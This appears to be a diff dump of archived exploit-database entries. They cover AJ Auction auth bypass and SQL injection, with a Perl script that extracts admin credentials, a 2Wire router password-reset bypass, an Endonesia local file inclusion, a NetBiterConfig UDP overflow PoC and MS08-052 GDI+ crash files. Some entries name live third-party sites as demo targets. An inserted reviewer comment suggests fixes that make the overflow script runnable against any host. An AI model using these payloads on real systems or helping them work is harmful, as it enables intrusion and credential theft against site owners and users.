IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
AJ Auction Auth Bypass Vulnerability
==============================================================================
[»] Script: [ AJ Auction ]
[»] Language: [ PHP ]
[»] Website: [ http://www.ajsquare.com/products/auction/ ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 10.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
[-] AJ Auction OOPD
[+] AJ Auction Pro Platinum Skin #1
[+] AJ Auction Pro Platinum Skin #2
[+] AJ Auction Web 2.0
===[ XPL ]===
[!] When the page gets load, Press ESC btn To Bypass Redirection ;)
[ Only AJ Auction Pro Platinum Skin #1 ]
[»] http://localhost/[path]/admin/user.php
[ all ]
[»] http://localhost/[path]/admin/site.php
[»] http://localhost/[path]/admin/auction.php
[»] http://localhost/[path]/admin/mail.php
[»] http://localhost/[path]/admin/fee_setting.php
[»] http://localhost/[path]/admin/earnings.php
[»] http://localhost/[path]/admin/insertion_fee_settings.php
[»] http://localhost/[path]/admin/custom_category.php
[»] http://localhost/[path]/admin/subcategory.php
[»] http://localhost/[path]/admin/category.php
[»] http://localhost/[path]/admin/report.php
[»] http://localhost/[path]/amdin/store_manager.php
[»] http://localhost/[path]/admin/choose_sell_format.php
[»] ...
===[ LIVE ]===
[!] Skin #1
[»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
[»] http://www.tapinglobal.com/admin/
[!] Web2.0
[»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-10]
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
AJ Auction Auth Bypass Vulnerability
==============================================================================
[»] Script: [ AJ Auction ]
[»] Language: [ PHP ]
[»] Website: [ http://www.ajsquare.com/products/auction/ ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 10.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
[-] AJ Auction OOPD
[+] AJ Auction Pro Platinum Skin #1
[+] AJ Auction Pro Platinum Skin #2
[+] AJ Auction Web 2.0
===[ XPL ]===
[!] When the page gets load, Press ESC btn To Bypass Redirection ;)
[ Only AJ Auction Pro Platinum Skin #1 ]
[»] http://localhost/[path]/admin/user.php
[ all ]
[»] http://localhost/[path]/admin/site.php
[»] http://localhost/[path]/admin/auction.php
[»] http://localhost/[path]/admin/mail.php
[»] http://localhost/[path]/admin/fee_setting.php
[»] http://localhost/[path]/admin/earnings.php
[»] http://localhost/[path]/admin/insertion_fee_settings.php
[»] http://localhost/[path]/admin/custom_category.php
[»] http://localhost/[path]/admin/subcategory.php
[»] http://localhost/[path]/admin/category.php
[»] http://localhost/[path]/admin/report.php
[»] http://localhost/[path]/amdin/store_manager.php
[»] http://localhost/[path]/admin/choose_sell_format.php
[»] ...
===[ LIVE ]===
[!] Skin #1
[»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
[»] http://www.tapinglobal.com/admin/
[!] Web2.0
[»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-10]


@ -1,32 +1,32 @@
==================================================================================================================
= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM =
= S N N N A A K K E S T E A A M M M M =
+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M +
= S N N N A A K K E S T E A A M M M =
= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M =
===================================================SNAKES TEAM====================================================
+ =
= AJAuctionPro OOPD v2.3 SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= :::::Mail: snakespc@gmail.com::::::: =
= = =
= http://www.ajsquare.com/products/auction/demo.php "index.php" =
=====================================GAZA=============================================
Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================== ALLAH AKBAR=========================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/sc >>>> Members
Str0ke ....Milw0rm
==================================================================GAZA============================================================
# milw0rm.com [2009-01-20]
==================================================================================================================
= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM =
= S N N N A A K K E S T E A A M M M M =
+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M +
= S N N N A A K K E S T E A A M M M =
= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M =
===================================================SNAKES TEAM====================================================
+ =
= AJAuctionPro OOPD v2.3 SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
= :::::Mail: snakespc@gmail.com::::::: =
= = =
= http://www.ajsquare.com/products/auction/demo.php "index.php" =
=====================================GAZA=============================================
Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================== ALLAH AKBAR=========================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/sc >>>> Members
Str0ke ....Milw0rm
==================================================================GAZA============================================================
# milw0rm.com [2009-01-20]


@ -1,53 +1,53 @@
#!/usr/bin/perl
#********************************************************#
# #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit #
# Software : AJ Auction Pro OOPD 2.x #
# Vendor : http://www.ajsquare.com/ #
# Author : NoGe #
# Contact : noge[dot]code[at]gmail[dot]com #
# Blog : http://evilc0de.blogspot.com #
# #
# [o] Usage #
# root@noge:~# perl ajpro.pl www.target.com #
# #
# [o] Dork #
# "Powered By AJ Auction Pro" #
# #
# [o] Greetz #
# MainHack BrotherHood [ http://mainhack.net ] #
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang #
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke #
# #
#********************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x] [C]oded By NoGe [x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }
# milw0rm.com [2009-08-18]
#!/usr/bin/perl
#********************************************************#
# #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit #
# Software : AJ Auction Pro OOPD 2.x #
# Vendor : http://www.ajsquare.com/ #
# Author : NoGe #
# Contact : noge[dot]code[at]gmail[dot]com #
# Blog : http://evilc0de.blogspot.com #
# #
# [o] Usage #
# root@noge:~# perl ajpro.pl www.target.com #
# #
# [o] Dork #
# "Powered By AJ Auction Pro" #
# #
# [o] Greetz #
# MainHack BrotherHood [ http://mainhack.net ] #
# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang #
# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella #
# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke #
# #
#********************************************************#
use HTTP::Request;
use LWP::UserAgent;
my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x] [C]oded By NoGe [x]\n";
print "[x]===============================================[x]\n\n";
my $exploit = "http://".$target.$file_vuln.$sql_query;
my $request = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }
# milw0rm.com [2009-08-18]


@ -1,20 +1,20 @@
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09)
DESCRIPTION
-----------------
Additional to the authentication bypass exploit page submitted by hkm.
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net/setup/password_required.html
bugz
# milw0rm.com [2009-08-18]
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09)
DESCRIPTION
-----------------
Additional to the authentication bypass exploit page submitted by hkm.
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net/setup/password_required.html
bugz
# milw0rm.com [2009-08-18]


@ -1,22 +0,0 @@
[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435

29
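--- /dev/null
+++ b/platforms/windows/dos/33403.py
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/37325/info
+Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+#!/usr/bin/python
+# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
+# Ruben Santamarta - www.reversemode.com
+# For research purposes ONLY.
+# If you use this code to cause damage Ill cut you open like a f***ing pig.
+import sys
+import socket
+s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
+s.connect(("10.10.10.10",3250))
+s.send("protocol version = 1.10; "
++"fb type = EVIL-DEVICE; "
++"module version = 0.66.6; "
++"mac = 00-30-11-00-BA-CA; "
++"ip = 192.168.1.52; "
++"sn = 255.255.255.0; "
++"gw = 192.168.1.1; "
++"dhcp = off; "
++"pswd = off; "
++"hn = "+"A"*0×60+"; "
++"dns1 = 192.168.1.33;")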
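Review bot: The `hn` field on the line `+"hn = "+"A"*0×60+"; "` is written with the Unicode multiplication sign (U+00D7) rather than the letter x, so if the committed file really contains that character Python raises a SyntaxError before any datagram is sent; it should read `+"hn = "+"A"*0x60+"; "`. The target is also hard-coded as `10.10.10.10` while `sys` is imported and never used, so taking the host from the command line would make the PoC usable without editing, e.g. `target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.10"` followed by `s.connect((target, 3250))`. A one-line comment such as `# hn (hostname) is the oversized field; 0x60 bytes presumably overruns the stack buffer described in BID 37325 - confirm against the advisory` would also help a reader who reaches the script without the SecurityFocus text, since the file itself never says which field triggers the overflow.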


@ -1,44 +1,44 @@
<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>
<body>
<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>
<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">
<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>
# milw0rm.com [2008-09-28]
<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>
<body>
<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>
<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">
<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>
# milw0rm.com [2008-09-28]


@ -1,217 +1,217 @@
------------------------------------------------------------------------------------------------------------
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================
#!/usr/bin/perl
#
use strict;
my $gif =
"\x47\x49\x46\x38\x39\x61". # GIF header
"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor
# COLOR Stream
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#1
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC".
"\x21\xEC".
#2
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#3
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#4
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#5
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#6
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#7
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#8
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#9
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#10
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#11
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E".
"\x01\x5A".
"\x00". ## Terminator
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#1
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#2
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#3
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
